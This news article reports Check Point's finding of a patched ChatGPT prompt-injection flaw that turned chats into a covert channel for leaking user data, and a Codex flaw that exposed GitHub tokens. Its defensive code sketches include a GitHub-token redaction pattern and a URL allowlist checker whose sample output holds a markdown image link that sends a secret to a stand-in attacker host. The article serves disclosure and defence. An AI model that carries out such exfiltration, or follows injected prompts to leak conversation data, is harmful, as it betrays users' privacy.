A significant security vulnerability in OpenAI’s ChatGPT allowed unauthorized extraction of user conversation data, according to research from cybersecurity firm Check Point. The flaw, which has now been patched, could have been exploited to siphon sensitive information from chats without users’ knowledge. OpenAI also addressed a separate vulnerability in its Codex system that risked exposing GitHub tokens.

Details of the ChatGPT Vulnerability



Check Point researchers discovered that a carefully crafted malicious prompt could transform a standard ChatGPT conversation into a covert data exfiltration channel. This method could bypass normal security controls, potentially leaking private user messages, uploaded files, and other confidential content shared within the chat interface. Exploitation required no user interaction beyond the malicious prompt being processed.

The cybersecurity company stated, “A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content.” The vulnerability represented a serious breach of user trust, as data could be stolen silently during what appeared to be a normal AI interaction.

The Codex GitHub Token Issue

In a related development, OpenAI patched a vulnerability within its Codex system, which is designed to translate natural language into code. The flaw could have allowed unauthorized access to a user’s GitHub tokens. These tokens are digital keys that grant access to repositories and code; their compromise could lead to further security breaches, including source code theft or unauthorized code commits.

While it affected general users less directly than the ChatGPT flaw, this vulnerability posed a substantial risk to developers and organizations using Codex integrations. Exposed tokens could have cascading security implications for software projects and proprietary codebases.
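One common precaution against token exposure in general is to redact anything that looks like a GitHub token before text is logged or passed to another system. The sketch below is illustrative only and is not OpenAI’s fix, whose details have not been published. The function name `redact_github_tokens` is hypothetical, the prefixes are the ones GitHub has documented for its tokens, and the minimum length in the pattern is a loose assumption rather than an exact specification.

```python
import re

# Prefixes GitHub documents for its tokens (ghp_, gho_, ghu_, ghs_, ghr_,
# github_pat_). The {20,} length bound is a loose assumption, not a spec.
TOKEN_PATTERN = re.compile(r"\b(?:gh[pousr]_|github_pat_)[A-Za-z0-9_]{20,}")


def redact_github_tokens(text: str) -> str:
    """Replace anything that looks like a GitHub token with a placeholder."""
    return TOKEN_PATTERN.sub("[REDACTED_GITHUB_TOKEN]", text)


if __name__ == "__main__":
    sample = "clone failed, token=ghp_" + "a" * 36 + " was rejected"
    print(redact_github_tokens(sample))
```

Pattern matching of this kind only reduces accidental leakage; it does not replace scoping tokens narrowly or revoking them after suspected exposure.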

OpenAI’s Response and Patches

Upon being notified by Check Point, OpenAI engineers moved swiftly to develop and deploy fixes for both security issues. The company has not disclosed the exact technical details of the vulnerabilities to prevent copycat exploitation attempts on unpatched systems. The patches were applied server-side, meaning most users received the security updates automatically without needing to take any action.

OpenAI maintains a bug bounty program that encourages security researchers to report vulnerabilities responsibly. The discovery and remediation of these flaws through this channel highlight the ongoing security challenges faced by large-scale AI platforms handling vast amounts of user data.

Broader Implications for AI Security

This incident underscores the evolving threat landscape for generative AI applications. As these tools become more integrated into daily workflows, handling increasingly sensitive corporate and personal data, their security posture is critical. The potential for “prompt injection” attacks, where malicious instructions are embedded within seemingly benign user input, is a growing area of concern for security professionals.

The fact that a simple prompt could trigger a data leak raises questions about the internal safeguards and data isolation mechanisms within AI chat systems. It also emphasizes the need for continuous security auditing of AI models and their supporting infrastructure.
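To make the idea of an output-side safeguard concrete, here is a minimal sketch of one generic defense: checking model output for links to hosts outside an allowlist before it is rendered, since such links are one way data can leave a conversation. This is not the technique Check Point described, nor OpenAI’s patch, neither of which has been detailed publicly. The names `ALLOWED_HOSTS` and `find_untrusted_urls`, and the example hosts, are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would define its own hosts.
ALLOWED_HOSTS = {"example.com", "docs.example.com"}

# Rough URL matcher: stops at whitespace and common closing delimiters.
URL_PATTERN = re.compile(r"https?://[^\s)\"'<>\]]+")


def find_untrusted_urls(model_output: str, allowed_hosts=ALLOWED_HOSTS) -> list[str]:
    """Return URLs in model_output whose host is not on the allowlist."""
    flagged = []
    for url in URL_PATTERN.findall(model_output):
        try:
            host = urlsplit(url).hostname or ""
        except ValueError:
            # Malformed URLs are treated as untrusted rather than ignored.
            host = ""
        if host not in allowed_hosts:
            flagged.append(url)
    return flagged


if __name__ == "__main__":
    output = (
        "See https://example.com/help for details. "
        "![status](https://attacker.invalid/log?d=secret)"
    )
    print(find_untrusted_urls(output))
```

A check like this is deliberately conservative: it flags every unknown host rather than trying to judge intent, which leaves the decision to block, strip, or ask the user to a separate policy layer.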

Looking Ahead

OpenAI is expected to continue enhancing its security protocols and conducting internal audits to identify similar vulnerabilities. The company will likely provide more detailed guidance to enterprise clients on secure implementation practices. The cybersecurity community anticipates increased scrutiny of the attack surface of large language models, with further research into prompt-based exploits and data containment failures likely to follow this disclosure.

Source: Check Point Research